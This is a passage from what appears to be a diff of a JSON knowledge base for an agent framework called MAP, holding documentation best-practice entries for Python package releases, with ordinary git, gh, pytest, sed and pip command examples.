Document derivation commands adjacent to artifact usage so maintainers see how to regenerate consistently.", - "code_example": "```markdown\n## Single Source of Truth: CHANGELOG.md\n\n**All release artifacts derive from CHANGELOG.md using these commands:**\n\n### Derive Git Tag Annotation\n\n```bash\n# Extract version section from CHANGELOG\nVERSION=\"1.0.1\"\nsed -n \"/## \\\\[$VERSION\\\\]/,/## \\\\[/p\" CHANGELOG.md | head -n -1 > tag-message.txt\n\n# Create annotated tag with CHANGELOG excerpt\ngit tag -a \"v$VERSION\" -F tag-message.txt\n```\n\n### Derive GitHub Release Notes\n\n```bash\n# Same extraction pattern ensures consistency\ngh release create v1.0.1 \\\n --title \"MAP Framework v1.0.1\" \\\n --notes \"$(sed -n '/## \\\\[1.0.1\\\\]/,/## \\\\[/p' CHANGELOG.md | head -n -1)\"\n```\n\n### Derive Version Strings\n\n```bash\n# Extract version from CHANGELOG header\ngrep -m 1 \"## \\\\[\" CHANGELOG.md | sed 's/.*\\\\[\\\\(.*\\\\)\\\\].*/\\\\1/'\n\n# Verify matches pyproject.toml\ngrep 'version = ' pyproject.toml | sed 's/.*\"\\\\(.*\\\\)\".*/\\\\1/'\n```\n\n**Why This Works:**\n- ❌ Manual copy-paste → content drift (typos, omissions)\n- ✅ Explicit derivation → deterministic consistency\n- ✅ Commands documented → maintainers regenerate correctly\n- ✅ Drift detection → Monitor catches wrong source usage\n```", - "tags": [ - "documentation", - "single-source-of-truth", - "derivation", - "consistency", - "changelog", - "releases", - "bash", - "sed", - "grep" - ], - "related_bullets": [ - "doc-0004", - "impl-0018" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0007", - "content": "Checklist-Troubleshooting Symmetry: Structure troubleshooting sections to mirror pre-flight checklists with 1:1 mapping. 
For each pre-flight checkpoint (e.g., 'Git Repository State', 'PyPI OIDC Setup'), create corresponding troubleshooting subsection addressing failures at that checkpoint. This symmetry reduces cognitive load - users map error symptoms to relevant troubleshooting section without searching. Pattern: 5 pre-release sections (Code Quality, Documentation, Dependencies, Git State, PyPI Setup) → 4 troubleshooting categories by component (Version Validation, Git State, CI/CD, PyPI OIDC). Include debug checklist mirroring pre-flight checkbox structure. Users follow same mental model for success path and failure recovery.", - "code_example": "```markdown\n## Pre-Release Checklist\n\n### 4. Git Repository State\n\n```bash\n# Verify on main branch\ngit branch --show-current\n# Expected: main\n\n# Verify working directory is clean\ngit status\n# Expected: \"nothing to commit, working tree clean\"\n```\n\n**Requirements**:\n- ✅ On `main` branch\n- ✅ Working directory is clean (no uncommitted changes)\n- ✅ Local branch is up to date with origin/main\n\n---\n\n## Troubleshooting\n\n### Git State Issues (mirrors section 4 above)\n\n#### Issue: \"Git working directory is not clean\"\n\n```bash\n# Check what's changed (same verification command)\ngit status\n\n# Fix: Commit changes\ngit add .\ngit commit -m \"chore: prepare for release\"\n```\n\n#### Issue: \"Not on main branch\"\n\n```bash\n# Check current branch (same verification command)\ngit branch --show-current\n\n# Fix: Switch to main\ngit checkout main\ngit pull origin main\n```\n\n### Debug Checklist (mirrors pre-flight structure)\n\n2. 
**Git State** (maps to Pre-Release Checklist #4):\n - [ ] On `main` branch\n - [ ] Working directory clean\n - [ ] Tag pushed to origin\n```", - "tags": [ - "documentation", - "troubleshooting", - "checklists", - "symmetry", - "user-experience", - "debugging", - "workflows", - "releases" - ], - "related_bullets": [ - "arch-0004", - "impl-0010", - "doc-0005" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0008", - "content": "Testable Documentation with Programmatic Verification: Design documentation examples with binary success criteria that can be programmatically verified via bash commands. Structure: (1) Command example, (2) Expected output/result with exact values (not 'success' - specify '100% test pass', 'exit code 0', 'file exists at /path'), (3) Verification command to check actual matches expected. This enables documentation CI/CD - automated verification prevents documentation rot where examples break as code evolves. Use grep/test commands for verification: 'pytest --cov && echo $? # Expected: 0', 'curl -f URL || echo FAILED'. 
Pattern proven: 18 checkboxes in RELEASING.md with measurable criteria (100% test pass, no errors, specific URLs) are programmatically verifiable.", - "code_example": "```markdown\n## Code Quality Checks\n\n### Example: Run Test Suite\n\n```bash\n# Command with inline verification\npytest tests/ --cov=src/mapify_cli --cov-report=term-missing\necho \"Exit code: $?\" # Verification point\n```\n\n**Expected Results** (programmatically verifiable):\n- ✅ All tests pass (100% success rate) → Verify: `pytest --tb=no -q && echo PASS || echo FAIL`\n- ✅ Coverage > 80% → Verify: `pytest --cov --cov-report=term | grep TOTAL | awk '{print $4}' | grep -E '^(8[0-9]|9[0-9]|100)%$'`\n- ✅ Exit code 0 → Verify: `pytest; echo $?` equals `0`\n\n### Example: Package Verification (Async Systems)\n\n```bash\n# Time-aware verification for distributed systems\nsleep 120 # Wait for PyPI indexing\ncurl -f https://pypi.org/project/mapify-cli/1.0.1/ && echo \"✅ VERIFIED\" || echo \"❌ FAILED\"\npip index versions mapify-cli | grep -q 1.0.1 && echo \"✅ INDEXED\" || echo \"❌ NOT FOUND\"\n```\n\n**Expected Results**:\n- ✅ HTTP 200 response → Verify: `curl -f URL` (exit 0)\n- ✅ Version 1.0.1 appears in index → Verify: `pip index versions PKG | grep -q VERSION`\n\n## Documentation CI/CD Pipeline\n\n```yaml\n# .github/workflows/docs-verification.yml\n- name: Verify documentation examples\n run: |\n # Extract and execute verification commands from docs\n grep -A 5 \"Expected Results\" RELEASING.md | grep \"Verify:\" | while read cmd; do\n eval \"$cmd\" || exit 1\n done\n```\n```", - "tags": [ - "documentation", - "testing", - "verification", - "ci-cd", - "binary-criteria", - "automation", - "bash", - "programmatic" - ], - "related_bullets": [ - "doc-0005", - "impl-0027", - "test-0002" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - 
"id": "doc-0009", - "content": "Consequence Documentation for Rollback Procedures: When documenting rollback/recovery procedures for distributed systems, explicitly document blast radius with concrete consequences using ✅/❌ markers. Structure: (1) Rollback command, (2) What DOES revert (✅ markers), (3) What DOES NOT revert (❌ markers with persistence explanation), (4) Impact on dependent systems. This prevents dangerous assumptions during incident response - operators understand exactly what rollback achieves vs what requires manual cleanup. Pattern: PyPI package yank documented with 3 explicit consequences ('pip install PKG will skip' ✅, 'pip install PKG==VER still works' ✅, 'Package files remain available' ✅). Non-reversible operations (database migrations, external API state) require consequence documentation to prevent data loss from incorrect rollback assumptions.", - "code_example": "```markdown\n## Rollback Procedures\n\n### Scenario 2: Package Published to PyPI with Bug\n\n#### Option A: Yank the Release (Recommended)\n\n**Command**:\n```bash\n# Via PyPI web interface (no CLI equivalent)\n# 1. Navigate to https://pypi.org/manage/project/mapify-cli/release/1.0.1/\n# 2. Click \"Options\" → \"Yank release\"\n# 3. 
Provide reason: \"Critical bug in config parser\"\n```\n\n**Consequences** (blast radius documentation):\n\n✅ **What DOES Change:**\n- `pip install mapify-cli` will skip v1.0.1 (resolves to latest non-yanked)\n- PyPI UI shows \"Yanked\" label on release page\n- Release marked as unsuitable for new installations\n\n✅ **What PERSISTS (Does NOT revert):**\n- `pip install mapify-cli==1.0.1` still works (explicit version bypasses yank)\n- Package files remain downloadable (tar.gz, wheel)\n- Existing installations are NOT affected (no force-uninstall)\n- Git tag v1.0.1 still exists (PyPI yank != git rollback)\n\n❌ **What Requires Manual Cleanup:**\n- Documentation referencing v1.0.1 (update to v1.0.2)\n- CI/CD pipelines pinned to v1.0.1 (update pins)\n- User support tickets (proactive communication)\n\n**Dependent System Impact**:\n- Downstream projects with `mapify-cli>=1.0.0` → Will skip 1.0.1, use 1.0.2\n- Downstream projects with `mapify-cli==1.0.1` → Still broken, require manual update\n- Docker images with `pip install mapify-cli==1.0.1` → Still build, contain bug\n```", - "tags": [ - "documentation", - "rollback", - "incident-response", - "distributed-systems", - "blast-radius", - "consequences", - "pypi", - "releases", - "recovery" - ], - "related_bullets": [ - "doc-0005", - "impl-0008" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0010", - "content": "Dual-Mode Documentation: Learning vs Execution: For complex workflows (releases, deployments, migrations), provide both learning mode (detailed explanations) and execution mode (consolidated runbook) in single document. 
Structure: (1) Main sections with detailed explanations, multiple examples, rationale, troubleshooting (learning mode - first-time users), (2) Appendix with consolidated command sequence, no explanations, copy-pasteable (execution mode - repeat operators). Learning mode frontloads cognitive investment (understand workflow), execution mode minimizes friction (run workflow quickly). Pattern proven: RELEASING.md with 8 detailed sections (350 lines) + appendix runbook (32-line command sequence). Separation prevents expert users from scrolling through explanations while preserving learning context for novices. Use clear section headers ('Appendix: Release Workflow Reference') to signal mode switch.", - "code_example": "```markdown\n# Release Process Documentation\n\n## 1. Pre-Release Checklist (LEARNING MODE)\n\nBefore starting the release process, verify all requirements are met.\n\n### 1.1 Code Quality Checks\n\n**Why**: Ensures production-ready code quality before tagging release.\n\n**How**:\n```bash\npytest tests/ --cov=src/mapify_cli --cov-report=term-missing\nblack src/ tests/ --check\nruff check src/ tests/\n```\n\n**Expected Results**:\n- ✅ All tests pass (100% success rate)\n- ✅ No linting errors\n\n**Troubleshooting**:\n- If tests fail: Fix failing tests before proceeding\n- If linter errors: Run `black src/ tests/` to auto-format\n\n### 1.2 Documentation Review\n\n**Why**: Users rely on accurate installation instructions.\n\n**How**:\n```bash\ngrep -A 20 \"## \\\\[Unreleased\\\\]\" CHANGELOG.md\n```\n\n**Expected Results**:\n- ✅ CHANGELOG.md has [Unreleased] section with all changes\n\n## 2. Version Bumping (LEARNING MODE)\n\n### Semantic Versioning\n\nMAP Framework follows [Semantic Versioning 2.0.0](https://semver.org/):\n- **MAJOR** (X.0.0): Breaking changes\n- **MINOR** (x.Y.0): New features\n- **PATCH** (x.y.Z): Bug fixes\n\n### Version Bump Script\n\n**Usage**:\n```bash\n./scripts/bump-version.sh patch # or minor/major\n```\n\n**What it does**:\n1. 
Validates version format\n2. Updates pyproject.toml\n3. Updates CHANGELOG.md\n4. Creates git commit and tag\n\n---\n\n## Appendix: Release Workflow Reference (EXECUTION MODE)\n\n**Use this for repeat releases - copy-paste command sequence.**\n\n```bash\n# Pre-checks\ngit checkout main && git pull origin main\ngit status # Must be clean\npytest tests/ --cov && black src/ tests/ --check && ruff check src/ tests/\ngrep -A 20 \"## \\\\[Unreleased\\\\]\" CHANGELOG.md # Verify changes documented\n\n# Version bump\n./scripts/bump-version.sh patch # or minor/major\ngit show # Review commit\n\n# Push and release\ngit push origin main\ngit push origin v1.0.1 # Replace with actual version\ngh release create v1.0.1 \\\n --title \"MAP Framework v1.0.1\" \\\n --notes \"$(sed -n '/## \\\\[1.0.1\\\\]/,/## \\\\[/p' CHANGELOG.md | head -n -1)\"\n\n# Monitor and verify\ngh run watch\nsleep 120\npip index versions mapify-cli | grep 1.0.1 # Verify PyPI indexing\n```\n\n**Execution checklist** (binary verification):\n- [ ] All pre-checks passed (no errors)\n- [ ] Git push succeeded (no rejections)\n- [ ] GitHub release created (check URL)\n- [ ] CI/CD workflow passed (gh run watch shows success)\n- [ ] PyPI package indexed (pip index returns 1.0.1)\n```", - "tags": [ - "documentation", - "dual-mode", - "runbooks", - "learning", - "execution", - "workflows", - "releases", - "user-experience", - "progressive-disclosure" - ], - "related_bullets": [ - "doc-0005", - "doc-0002", - "doc-0007" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0011", - "content": "Temporal Risk Management in Pre-Release Documentation: When documenting unreleased functionality (pre-PyPI packages, pending features, upcoming APIs), use Predictor agent to analyze temporal dependencies and create rollout checklists. 
Temporal risks include advertising non-existent packages (README says 'pip install' before PyPI publish), referencing unreleased API versions, or documenting features gated behind feature flags. Structure: (1) Identify temporal claims (uses future-tense or version-specific language), (2) Map claims to release blockers (e.g., 'pip install' requires PyPI publish), (3) Create pre-publish checklist with binary verification (e.g., 'curl -f https://pypi.org/project/PKG/ && echo LIVE'). Pattern prevents user frustration from following documentation that references unavailable functionality. Proven: Predictor flagged HIGH risk when README advertised PyPI package before publish workflow completed.", - "code_example": "```markdown\n## Temporal Risk Analysis Example\n\n### Documentation Claim (Temporal)\n```markdown\n# README.md (pre-release draft)\n## Installation\n\n```bash\npip install mapify-cli\n```\n```\n\n### Risk Analysis (Predictor Output)\n\n**Temporal Dependency Detected**:\n- Claim: \"pip install mapify-cli\" (present tense, implies currently available)\n- Reality: Package not published to PyPI yet (release workflow not run)\n- Risk Level: HIGH (users will encounter 404 errors)\n\n**Rollout Checklist** (binary verification):\n```bash\n# Pre-publish: Verify package does NOT exist yet\ncurl -f https://pypi.org/project/mapify-cli/ && echo \"⚠️ ALREADY LIVE\" || echo \"✅ Not published yet\"\n\n# Post-publish: Verify package is indexed\nsleep 120 # PyPI indexing delay\ncurl -f https://pypi.org/project/mapify-cli/ && echo \"✅ LIVE\" || echo \"❌ NOT INDEXED\"\npip index versions mapify-cli | grep -q 1.0.0 && echo \"✅ INSTALLABLE\" || echo \"❌ NOT FOUND\"\n```\n\n### Mitigation Strategy\n\n**Option A - Version Pin Documentation to Release**:\nOnly add \"pip install\" section AFTER PyPI publish verified.\n\n**Option B - Future-Tense Documentation**:\n```markdown\n## Installation (Available After v1.0.0 Release)\n\nOnce released to PyPI, install via:\n```bash\npip install 
mapify-cli\n```\n\n*Note: Pre-release installation requires git clone (see Development Setup)*\n```\n```", - "tags": [ - "documentation", - "temporal-risk", - "pre-release", - "predictor", - "pypi", - "rollout", - "verification", - "releases" - ], - "related_bullets": [ - "doc-0005", - "doc-0007" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0012", - "content": "Progressive Complexity Installation Documentation: Structure installation sections using progressive disclosure from simple (recommended path) to advanced (expert configurations), with explicit user segmentation labels. Three complexity tiers: (1) Simple - single command for mainstream use case (pip install, no options), labeled 'Recommended' or 'Quick Start', (2) Intermediate - installation with optional features (pip install PKG[extras], version pinning), labeled 'Common Use Cases', (3) Advanced - development setup, custom builds, security configurations, labeled 'Advanced Setup'. Each tier references next tier for users needing more control. Pattern proven: README with simple→intermediate→advanced progression achieved 9.1/10 Evaluator score with praise for 'progressive complexity design'. Prevents overwhelming novice users while providing expert users path to customization. Use collapsible sections (
) or clear tier headers.", - "code_example": "```markdown\n## Installation\n\n### Recommended (Simple Tier)\n\nFor most users, install the latest stable release:\n\n```bash\npip install mapify-cli\n```\n\nThat's it! Verify installation: `mapify --version`\n\n*Need more control over versions or want to contribute? See Common Use Cases and Advanced Setup below.*\n\n---\n\n### Common Use Cases (Intermediate Tier)\n\n
\nInstall Specific Version\n\n**Exact version** (reproducible builds):\n```bash\npip install mapify-cli==1.0.1\n```\n\n**Version range** (patch updates only):\n```bash\npip install \"mapify-cli>=1.0.0,<1.1.0\"\n```\n\nSee [Semantic Versioning Guide](#semver-explanation) for pinning strategies.\n\n
\n```", - "tags": [ - "documentation", - "progressive-complexity", - "installation", - "user-segmentation", - "markdown", - "collapsible-sections", - "user-experience", - "pip" - ], - "related_bullets": [ - "doc-0002", - "doc-0010" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0013", - "content": "Cross-Reference Architecture for Documentation Depth: Build documentation as interconnected layers where README (entry point) provides overview with explicit links to specialized documentation (deeper dive), which links to reference documentation (exhaustive detail). Three-tier pattern: (1) README - 80/20 coverage, most common use cases, links to tier 2 for edge cases, (2) Specialized docs - feature-specific guides (RELEASING.md, CONTRIBUTING.md, ARCHITECTURE.md), comprehensive workflows, links to tier 3 for API details, (3) Reference docs - API docs, module docstrings, exhaustive parameter lists. Use explicit cross-reference phrases ('See RELEASING.md for complete workflow', 'For API details, see [module reference]'). Pattern prevents README bloat (information overload) while ensuring users can navigate to depth they need. 
Proven: Evaluator praised 'excellent cross-referencing strategy' for README linking to RELEASING.md, CONTRIBUTING.md, API reference.", - "code_example": "```markdown\n### Tier 1: README.md (Entry Point)\n\n```markdown\n## Quick Start\n\n```bash\npip install mapify-cli\nmapify init\n```\n\n*For complete installation options, see [INSTALL.md](docs/INSTALL.md).*\n\n## Architecture\n\nMAP uses 6 core agents: Actor, Monitor, Evaluator...\n\n*For architectural deep dive, see [ARCHITECTURE.md](docs/ARCHITECTURE.md).*\n```\n```", - "tags": [ - "documentation", - "cross-reference", - "architecture", - "three-tier", - "readme", - "specialized-docs", - "api-reference", - "navigation", - "information-architecture" - ], - "related_bullets": [ - "doc-0006", - "doc-0010" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0014", - "content": "Version Management Documentation with Dynamic References: Use placeholder patterns and dynamic sources for version references in user-facing documentation to minimize maintenance burden during version bumps. Five strategies: (1) Generic 'latest' references for non-critical contexts ('pip install PKG' without version), (2) Fail-loud placeholder variables for version-specific examples ({{VERSION}} in templates - MUST use {{DOUBLE_BRACE}} syntax, not [BRACKETS] or ALLCAPS, because double-braces break grep if incomplete and follow templating conventions), (3) Placeholder verification instructions (find-replace checklist + 'grep returns 0 results' validation), (4) Dynamic badges linking to PyPI/GitHub APIs for current version display, (5) '--version command' references instead of hardcoded version strings. Reserve exact version pins (PKG==1.0.1) for reproducibility-critical contexts (Docker, CI/CD, security advisories). 
Pattern proven: Evaluator praised 'future-proof examples' for README avoiding hardcoded versions. Fail-loud placeholders reduce substitution errors where {{VERSION}} remains in published docs.", - "code_example": "```markdown\n### Strategy 2: Fail-Loud Placeholders (Template Mode)\n\n## Before Starting Release\nReplace all version placeholders:\n1. Find-replace: {{VERSION}} → 1.2.3 (double-brace syntax)\n2. Verify complete: `grep '{{VERSION}}' docs/` → 0 results\n3. If grep finds matches → substitution incomplete (FAIL LOUD)\n\n### Installation (Template Example)\n\n```bash\npip install mapify-cli=={{VERSION}} # ✅ Breaks grep if incomplete\n```\n\n❌ BAD - Silent failure:\n```bash\npip install mapify-cli==[VERSION] # Completes grep check even if [VERSION] remains\npip install mapify-cli==VERSION # grep 'VERSION' finds many false positives\n```\n\n### Strategy 3: Placeholder Verification\n\n```bash\n# Verification checklist\n- [ ] Replace {{VERSION}} with actual version (e.g., 1.2.3)\n- [ ] Run: grep '{{VERSION}}' docs/ release-checklist.md\n- [ ] Expected: 0 results (no matches)\n- [ ] If matches found: substitution incomplete, DO NOT PROCEED\n```\n\n### Strategy 4: Dynamic Badges (API-Driven)\n\n[![PyPI version](https://badge.fury.io/py/mapify-cli.svg)](https://pypi.org/project/mapify-cli/)]\n\n### Strategy 5: Command References (Runtime)\n\n```bash\nmapify --version # ✅ Returns current version\n```\n```", - "tags": [ - "documentation", - "version-management", - "dynamic-references", - "placeholders", - "badges", - "pip", - "maintenance", - "automation", - "releases" - ], - "related_bullets": [ - "doc-0006", - "doc-0005" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0015", - "content": "Semantic Versioning Education in User Documentation: Include educational context explaining semantic 
versioning (semver) implications when documenting version pinning strategies. Users often pin versions incorrectly (too restrictive or too permissive) without understanding trade-offs. Provide decision matrix: (1) Exact pin (PKG==1.0.1) - maximum reproducibility, no updates including security patches, use for Docker/CI, (2) Patch range (PKG~=1.0.1 or >=1.0.1,<1.1.0) - security updates allowed, breaking changes blocked, use for applications, (3) Minor range (PKG>=1.0.0,<2.0.0) - new features allowed, major version breakage blocked, use for libraries, (4) Unpinned (PKG) - always latest, automatic updates, use for local development. Link to semver.org for specification details. Pattern proven: Monitor caught MEDIUM gap (missing semver explanation), fix adding decision matrix improved understanding and reduced support questions.", - "code_example": "```markdown\n## Semantic Versioning Guide\n\nVersion format: MAJOR.MINOR.PATCH (e.g., 1.4.2)\n\n| Strategy | Syntax | Updates | Use Case |\n|----------|--------|---------|----------|\n| **Exact** | `==1.0.1` | None | Docker, CI |\n| **Patch** | `~=1.0.1` | 1.0.x only | Production |\n| **Minor** | `>=1.0,<2.0` | 1.x.x | Libraries |\n| **Unpinned** | (none) | Latest | Dev |\n\n**Security Advisory Example**:\n- Exact pin (`==1.0.0`): ❌ Vulnerable until manual update\n- Patch range (`~=1.0.0`): ✅ Auto-updates to 1.0.1 (patched)\n```", - "tags": [ - "documentation", - "semantic-versioning", - "semver", - "education", - "version-pinning", - "pip", - "dependencies", - "security", - "user-education", - "decision-matrix" - ], - "related_bullets": [ - "doc-0012", - "doc-0014" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T20:48:15.743795+00:00", - "last_used_at": "2025-10-25T20:48:15.743795+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0016", - "content": "Risk-Responsive Documentation Design: For high-stakes procedural documentation (releases, deployments, disaster 
recovery, incident response), apply Predictor-driven risk mitigation when estimated risk score ≥5.0/10 (MEDIUM or HIGH). Systematically apply layered defenses targeting specific Predictor-identified failure modes: fail-loud placeholders (prevent incomplete substitution), time estimates (combat completion anxiety), emoji markers (highlight irreversible operations), sync comments (prevent multi-file drift). Each mitigation addresses distinct cognitive or process failure. Pattern proven: Subtask 8 release checklist applied 5 mitigations, reduced Predictor risk from 5.2/10 (MEDIUM) to ~3.5/10 (LOW), estimated quality improvement 8.1→9.0/10. Applicable beyond software releases: database migrations requiring rollback plans, production deployments with verification gates, security incident response procedures. Risk-responsive design transforms documentation from passive reference to active safety system.", - "code_example": "```markdown\n\n# Release Checklist\n\n## Pre-Release\n- [ ] Run tests\n- [ ] Update CHANGELOG\n- [ ] Bump version in files\n- [ ] Push tag\n- [ ] Create release\n\n\n# Release Checklist v{{VERSION}}\n\n## Before Starting (~5 min)\n⚠️ CRITICAL: Replace all {{VERSION}} placeholders:\n1. Find-replace: {{VERSION}} → 1.2.3\n2. Verify: `grep '{{VERSION}}' release-checklist.md` → 0 results\n3. If grep finds matches → STOP, substitution incomplete\n\n## Phase 1: Pre-Release (~30-45 min)\n- [ ] Run test suite: `pytest --cov` (expected: 100% pass)\n- [ ] Update CHANGELOG.md with release notes\n- [ ] Bump version: `./scripts/bump-version.sh patch`\n- [ ] ⚠️ IRREVERSIBLE: Push tag v{{VERSION}} to origin\n\n## Phase 2: Release Creation (~15-20 min)\n- [ ] ⚠️ PRODUCTION: Create GitHub release (triggers CI/CD)\n- [ ] Monitor workflow: `gh run watch`\n\n\n\n\nTotal time: ~60-90 minutes\n\nMitigations applied:\n1. {{VERSION}} fail-loud placeholder (prevents incomplete substitution)\n2. Time estimates per phase (combats completion anxiety)\n3. 
⚠️ emoji markers for irreversible ops (5-10% of items)\n4. Expected results (binary verification)\n5. Sync comments (prevents doc drift)\n```", - "tags": [ - "documentation", - "risk-mitigation", - "predictor", - "checklists", - "high-stakes", - "cognitive-load", - "safety", - "releases", - "deployments" - ], - "related_bullets": [ - "doc-0005", - "doc-0010", - "doc-0014" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0017", - "content": "Dual-Channel Critical Operation Markers: In long procedural checklists (50+ items, 6+ phases), use dual-channel markers for high-consequence operations: emoji ⚠️ visual marker + textual severity label (CRITICAL/IRREVERSIBLE/DESTRUCTIVE/PRODUCTION). Limit to 5-10% of total items to preserve signal strength. Dual-channel design works because: (1) Emoji provides rapid visual scanning (pre-attentive processing), (2) Textual label provides semantic precision (what type of consequence), (3) Redundant encoding survives degraded viewing conditions (terminal without emoji support, printed documentation). Reserve markers for operations with irreversible consequences (git push tags, production deployments, database drops, API key rotation) or high-impact failures (OIDC setup errors block release, incorrect version breaks semver). Overuse dilutes signal (checkbox fatigue). Pattern proven: Subtask 8 release checklist marked 3 of 30 items (~10%) with ⚠️ IRREVERSIBLE, Evaluator scored 8.1/10. 
Applicable to: disaster recovery procedures, production deployment checklists, incident response runbooks, privilege escalation workflows.", - "code_example": "```markdown\n\n## Release Process\n- [ ] Run tests\n- [ ] Update docs\n- [ ] Push tag to origin (triggers release workflow)\n- [ ] Create GitHub release\n- [ ] Monitor CI/CD\n- [ ] Verify PyPI upload\n\n\n## Release Process\n- [ ] Run tests: `pytest --cov`\n- [ ] Update docs: verify CHANGELOG.md\n- [ ] ⚠️ IRREVERSIBLE: Push tag v1.2.3 to origin\n - Once pushed, tag triggers automated release workflow\n - Cannot unpublish from PyPI after upload\n - Verify version is correct BEFORE pushing\n- [ ] ⚠️ PRODUCTION: Create GitHub release\n - Triggers CI/CD pipeline to build and publish to PyPI\n - Visible to all users immediately\n- [ ] Monitor workflow: `gh run watch`\n- [ ] Verify upload: `pip index versions mapify-cli | grep 1.2.3`\n```", - "tags": [ - "documentation", - "checklists", - "cognitive-load", - "emoji", - "markers", - "critical-operations", - "dual-channel", - "user-experience", - "releases", - "incident-response" - ], - "related_bullets": [ - "doc-0005", - "doc-0016" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0018", - "content": "Time Estimates for Checkbox Fatigue: For procedural checklists exceeding 30 items or 6 distinct phases, add time estimates per phase (~MIN-MAX min format) and total workflow time. Time estimates combat three cognitive failures: (1) Unknown completion anxiety (users unsure if checklist takes 10 min or 2 hours, hesitate to start), (2) Unrealistic scheduling (users allocate insufficient time, get interrupted mid-workflow, lose context), (3) Progress tracking failure (no milestones, unknown if on pace). Format: phase header with time range (~30-45 min), total at document top (~60-90 min). 
Use ranges not point estimates to account for variability (first-time vs repeat execution, system differences). Estimate conservatively (80th percentile completion time, not median). Pattern proven: Subtask 8 release checklist added time estimates, Evaluator noted 'realistic time budgeting' as quality signal. Applicable to: installation procedures, deployment checklists, troubleshooting workflows, data migration runbooks. Avoid for non-linear workflows (exploratory debugging, research tasks) where time estimates create false precision.", - "code_example": "```markdown\n\n# Database Migration Checklist\n\n## Pre-Migration Validation\n- [ ] Backup production database\n- [ ] Verify backup integrity\n- [ ] Test migration on staging\n\n## Migration Execution\n- [ ] Enable maintenance mode\n- [ ] Run migration script\n- [ ] Verify data integrity\n\n\n# Database Migration Checklist\n\n**Total estimated time: ~90-120 minutes** (first-time: 120-150 min)\n\n## Phase 1: Pre-Migration Validation (~30-40 min)\n- [ ] Backup production database: `pg_dump` (~15-20 min for 10GB DB)\n- [ ] Verify backup integrity: `pg_restore --list` (~2-3 min)\n- [ ] Test migration on staging: `./migrate.sh staging` (~10-15 min)\n\n## Phase 2: Migration Execution (~40-60 min)\n- [ ] Enable maintenance mode: `./maintenance.sh on` (~1 min)\n- [ ] Run migration script: `./migrate.sh production` (~30-45 min)\n- [ ] Verify data integrity: `./verify-migration.sh` (~5-10 min)\n```", - "tags": [ - "documentation", - "checklists", - "time-estimates", - "cognitive-load", - "completion-anxiety", - "scheduling", - "user-experience", - "migrations", - "deployments" - ], - "related_bullets": [ - "doc-0010", - "doc-0016", - "doc-0017" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:53:59.231237+00:00", - "last_used_at": "2025-10-26T08:53:59.231237+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0019", - "content": "Multi-File Documentation Sync 
Comments: For multi-file consistency requirements (release checklist ↔ release guide, API reference ↔ implementation, schema docs ↔ migration guide), add bidirectional HTML sync comments at top of BOTH files. Format: . Sync comments transform documentation drift from invisible accident to intentional choice by: (1) Making drift visible in git diff (comment appears in context), (2) Catchable in code review (reviewer sees sync reminder), (3) Explicit rationale (why files must stay synchronized). Without sync comments, multi-file consistency relies on author memory (fails after 2+ weeks) or institutional knowledge (lost when authors leave). Comments are HTML (invisible in rendered markdown), version-controlled (tracked in git history), bidirectional (both files reference each other to catch partial updates). Pattern proven: Subtask 8 added sync comments between RELEASING.md ↔ release-checklist.md, reduced Predictor risk score. Applicable to: API reference ↔ SDK implementation docs, database schema ↔ migration guides, CLI help text ↔ user manual, disaster recovery procedure ↔ runbook checklist.", - "code_example": "```markdown\n\n\n\n# Release Process Guide\n\n## Pre-Release Validation\n\n1. 
